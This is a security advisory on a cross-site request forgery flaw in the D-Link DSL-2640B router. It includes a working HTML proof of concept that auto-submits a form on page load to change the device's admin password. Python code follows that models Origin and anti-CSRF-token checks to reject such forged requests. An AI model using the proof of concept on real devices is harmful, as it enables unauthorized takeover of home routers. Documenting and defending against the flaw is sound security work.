Release date:
Updated on:
Affected Systems:
D-Link DSL-2640B
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52096
The D-Link DSL-2640B is a combined modem and router.
The D-Link DSL-2640B has a cross-site request forgery (CSRF) vulnerability that allows an attacker to perform privileged actions on an affected device, such as changing its configuration, causing a denial of service, or injecting arbitrary script code.
Source: Ivano Binetti
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users proceed at their own risk!
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://www.example.com:80/redpass.cgi?SysPassword=new_password&amp;change=1">
</form>
</body>
</html>
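The proof of concept works because the browser attaches the victim's authenticated session to the auto-submitted POST, and the device accepts the request without checking where it came from. The following Python is an added example, not part of this advisory and not D-Link's firmware: it models the two checks a configuration handler such as redpass.cgi would need in order to reject such a request, a same-origin check on the Origin/Referer header and a per-session anti-CSRF token. The device origin, the session token, and the sample requests are constructed for illustration; the forged request mirrors the form above.

```python
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlparse

# Assumed address of the device's own admin interface (constructed; the real
# DSL-2640B interface is not modelled here).
DEVICE_ORIGIN = "http://192.168.1.1"

# Methods that must never change state and therefore need no CSRF check.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_token() -> str:
    """Generate a per-session anti-CSRF token to embed in the config form."""
    return secrets.token_urlsafe(32)


def _origin_of(url: str) -> Optional[str]:
    """Reduce a URL to scheme://host[:port]; None if it cannot be parsed."""
    parsed = urlparse(url)
    if not parsed.scheme or not parsed.netloc:
        return None
    return f"{parsed.scheme}://{parsed.netloc}"


def check_request(request: dict, session_token: str) -> Tuple[bool, str]:
    """Decide whether a state-changing request may be processed.

    request: {"method": str, "path": str, "headers": {...}, "form": {...}}
    Returns (allowed, reason). Fails closed when evidence of origin is missing.
    """
    if request["method"].upper() in SAFE_METHODS:
        return True, "safe method"

    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}

    # Check 1: the request must originate from the device's own UI.
    # Origin is preferred; Referer is the fallback for browsers that omit Origin.
    source = headers.get("origin") or headers.get("referer")
    if source is None:
        return False, "no Origin or Referer header (fail closed)"
    if _origin_of(source) != DEVICE_ORIGIN:
        return False, f"cross-origin request from {_origin_of(source)}"

    # Check 2: the form must carry the token tied to this session.
    # compare_digest avoids leaking the token through timing differences.
    submitted = request.get("form", {}).get("csrf_token", "")
    if not hmac.compare_digest(submitted, session_token):
        return False, "missing or mismatched anti-CSRF token"

    return True, "same-origin request with valid token"


SESSION_TOKEN = issue_token()

# Constructed: what the auto-submitting form above produces. The browser sends
# the victim's cookie, but Origin names the attacker's page and no token exists.
FORGED = {
    "method": "POST",
    "path": "/redpass.cgi",
    "headers": {"Origin": "http://attacker.example", "Cookie": "SESSIONID=abc"},
    "form": {"SysPassword": "new_password", "change": "1"},
}

# Constructed: the same change submitted from the device's own admin page.
LEGIT = {
    "method": "POST",
    "path": "/redpass.cgi",
    "headers": {"Origin": DEVICE_ORIGIN, "Cookie": "SESSIONID=abc"},
    "form": {"SysPassword": "new_password", "change": "1", "csrf_token": SESSION_TOKEN},
}

# Constructed: Origin and Referer stripped (e.g. by a privacy proxy), no token.
HEADERLESS = {
    "method": "POST",
    "path": "/redpass.cgi",
    "headers": {"Cookie": "SESSIONID=abc"},
    "form": {"SysPassword": "new_password", "change": "1"},
}

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT), ("headerless", HEADERLESS)):
        allowed, reason = check_request(req, SESSION_TOKEN)
        print(f"{name:10s} allowed={allowed} ({reason})")
```

Both checks matter: the origin check alone fails closed on proxied traffic that strips headers, and the token alone is defeated if the token is guessable or reused across sessions. Comparing Referer by origin rather than full URL avoids rejecting legitimate submissions from different pages of the same admin interface.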
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
The vendor has not yet released a patch or upgrade. Users of this product should watch the vendor's homepage for the latest version:
http://www.dlink.com/